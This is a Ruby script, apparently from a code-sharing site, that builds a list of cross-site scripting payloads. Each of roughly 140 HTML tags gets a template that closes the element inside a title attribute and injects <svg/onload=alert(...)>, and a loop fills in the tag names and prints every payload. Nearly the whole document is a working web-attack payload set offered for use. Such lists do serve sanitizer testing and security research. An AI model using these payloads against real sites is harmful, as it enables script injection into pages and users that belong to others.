1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
|
arr = ['<a><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<abbr><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<address><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<applet><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<area><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<article><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<aside><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<audio><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<b><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<base><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<basefont><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<bdi><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<bdo><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<big><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<blink><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<blockquote><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<body><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<br><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<button><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<canvas><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<caption><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<center><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<cite><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<code><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<col><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<colgroup><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<content><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<data><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<datalist><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dd><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<del><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<details><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dfn><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dialog><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dir><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<div><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dl><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<dt><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<em><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<embed><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<fieldset><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<figcaption><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<figure><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<font><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<footer><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<form><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<frame><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<frameset><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h1><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h2><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h3><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h4><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h5><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<h6><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<head><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<header><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<hgroup><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<hr><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<html><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<i><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<iframe><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<img><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<input><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<ins><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<isindex><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<kbd><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<keygen><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<label><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<legend><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<li><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<link><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<listing><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<main><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<map><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<mark><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<marquee><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<menu><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<menuitem><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<meta><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<meter><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<nav><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<nobr><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<noframes><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<noscript><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<object><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<ol><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<optgroup><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<option><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<output><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<p><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<param><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<picture><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<plaintext><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<pre><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<progress><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<q><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<rp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<rt><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<rtc><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<ruby><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<s><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<samp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<script><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<section><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<select><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<shadow><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<slot><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<small><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<source><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<spacer><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<span><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<strike><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<strong><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<style><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<sub><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<summary><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<sup><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<table><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<tbody><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<td><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<template><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<textarea><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<tfoot><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<th><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<thead><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<time><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<title><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<tr><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<track><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<tt><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<u><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<ul><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<var><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<video><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<wbr><p title="</#{endtag}><svg/onload=alert(#{starttag})>">',
'<xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">']
arr.each do |payload|
pp = payload.split('>')
payload = payload.gsub('#{endtag}', pp[0][1..-1])
payload = payload.gsub('#{starttag}', "'"+pp[0][1..-1].to_s+"'")
p payload
end
|